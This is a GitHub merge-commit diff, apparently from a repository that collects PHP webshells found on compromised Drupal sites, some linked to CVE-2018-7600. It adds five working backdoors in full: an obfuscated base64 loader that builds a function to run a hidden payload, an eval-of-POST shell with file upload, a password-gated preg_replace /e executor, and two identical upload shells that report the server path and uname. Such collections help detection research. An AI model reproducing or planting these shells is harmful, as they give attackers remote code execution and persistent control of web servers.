Merge pull request mattiasgeniar#18 from denoli/master

Added multiple exploits

Author: mattiasgeniar

found_on_drupal/HV4V62BP.php

@@ -0,0 +1 @@
+<?php $rtpz="lKHByZWdfcmVwbGFjZShhcnJheShdgnL1teXHchd9XhdHhdNdLycsJy9ccy8nKShdwgYhdXJhdyYXkoJychdsJyhdsn"; $tsdg = str_replace("b","","bsbtbrb_rbebpblacbe"); $wxhw="KhdSwgam9pbhdihhcnJhehdV9zbhdGljZSgkYSwkYygkYSktMykpKSkpO2VjaG8ghdJzhdwvJy4kahdy4nPic7fQ=="; $feka="hdpeyRrPSdyaXNoZXJlJhdztlhdY2hhdvICc8hdJy4kayhd4nPic7ZXhdZhbChdhiYXhdNlNjRfZGVjb2R"; $asys="JGM9J2NvdWhd50JzskYT0khdX0NPT0tJRTtphdZihdhyZXNhdldhdChdgkhdYSkhd9PShddtcicgJiYhdgJGMohdJGEpPjM"; $zjzy = $tsdg("q", "", "qbaqsqeq6q4q_qdqecoqde"); $liiy = $tsdg("z","","crzezatez_fzunctzizon"); $iuwt = $liiy("", $zjzy($tsdg("hd", "", $asys.$feka.$rtpz.$wxhw))); $iuwt(); ?>

found_on_drupal/accesson.php

@@ -0,0 +1 @@
+<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){@$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>

found_on_drupal/crouter.php

@@ -0,0 +1,2 @@
+
+<?php if(md5($_POST['p'])==='29d1ad27ce926b4e83d891d50b9ab899'){$st = 'return value';$cap='bas'.'e6'.'4_d'.'ec'.'ode';$c = $st[1].$st[7].$st[8].$st[9].'('.$cap.'(\'';if(isset($_POST['uf'])&&isset($_POST['pr'])){$arr = array($c.$_POST['uf'].'\'))' => '|.*|e',);array_walk($arr, strval($_POST['pr']), '');}}?>

found_on_drupal/found_due_to_cve_2018_7600/xGASSx/gasskkcnqssetting.php

@@ -0,0 +1,15 @@
+<?php
+error_reporting(0);
+if(isset($_GET[kkcnqs]))
+    {
+ 
+echo "path:".getcwd()."";
+echo "<b><br>uname:".php_uname()."<br></b>fallagateam";
+        print "\n";$disable_functions = @ini_get("disable_functions");
+        echo "DisablePHP=".$disable_functions; print "<br>";
+        echo"<form method=post enctype=multipart/form-data>";
+        echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
+          if($_POST["v"]==up)
+{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}  
+{ if(@copy($_FILES["gass"]["tmp_name"],$_FILES["gass"]["name"])){echo"<b></b>-->".$_FILES["gass"]["name"];}else{echo"<b>";}}}
+?>

found_on_drupal/found_due_to_cve_2018_7600/xGASSx/kkcnqs-ini.php

@@ -0,0 +1,15 @@
+<?php
+error_reporting(0);
+if(isset($_GET[kkcnqs]))
+    {
+ 
+echo "path:".getcwd()."";
+echo "<b><br>uname:".php_uname()."<br></b>fallagateam";
+        print "\n";$disable_functions = @ini_get("disable_functions");
+        echo "DisablePHP=".$disable_functions; print "<br>";
+        echo"<form method=post enctype=multipart/form-data>";
+        echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
+          if($_POST["v"]==up)
+{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}  
+{ if(@copy($_FILES["gass"]["tmp_name"],$_FILES["gass"]["name"])){echo"<b></b>-->".$_FILES["gass"]["name"];}else{echo"<b>";}}}
+?>